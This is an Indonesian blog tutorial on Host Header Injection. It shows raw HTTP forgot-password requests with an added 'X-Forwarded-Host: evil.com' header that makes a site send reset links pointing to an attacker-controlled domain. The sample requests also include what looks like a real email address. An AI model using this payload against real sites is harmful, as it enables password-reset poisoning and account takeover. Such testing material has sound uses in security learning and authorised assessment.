Exploitasi Host Header Injection

Host Header Injection adalah kerentanan yang  memanfaatkan perubahan host pada request header situs web atau aplikasi web mana yang harus memproses permintaan HTTP yang masuk. Web server menggunakan header ini sebagai tujuan pengiriman request data. Host Header yang di injeksi dapat membuat request yang dikirimkan teralihkan ke host atau situs yang telah diubah. X-Forwarded-Host adalah salah satu payload yang sering digunakan untuk melakukan exploitasi host header injection.
Karna ga ada Labs ama Ga ada live target jadi saya kasih teorinya doang ya


  • Pertama lakukan Intercept dengan Burp suite atau gunakan Inspect elemen dan masuk ke tab network


  • lakukan forgot password


POST /fr/fr/customer/forgot_password HTTP/1.1
Host: www.anuan.com
[...]


forgot_password%5Bemail%5D=pl.maltais%40hotmail.com&forgot_password%5B_token%5D=PxxeRzpschRfb_gIALVPMsuIj4AB4vwKpYbrrNSn-k8



  • Lalu masukkan payload  X-Forwarded-Host: evil.com dibawah header  Host: www.anuan.com.


POST /fr/fr/customer/forgot_password HTTP/1.1
Host: www.anuan.com
X-Forwarded-Host: evil.com
[...]


forgot_password%5Bemail%5D=pl.maltais%40hotmail.com&forgot_password%5B_token%5D=PxxeRzpschRfb_gIALVPMsuIj4AB4vwKpYbrrNSn-k8


  • cek pesan yang masuk di email kamu, jika domain pada reset password ganti, berarti bisa dipastikan site tersebut memiliki kerentanan Host Header Injection


Preview



Sekian tutorial unfaedah ini, semoga bermanfaat

Catatan: Hanya anggota dari blog ini yang dapat mengirim komentar.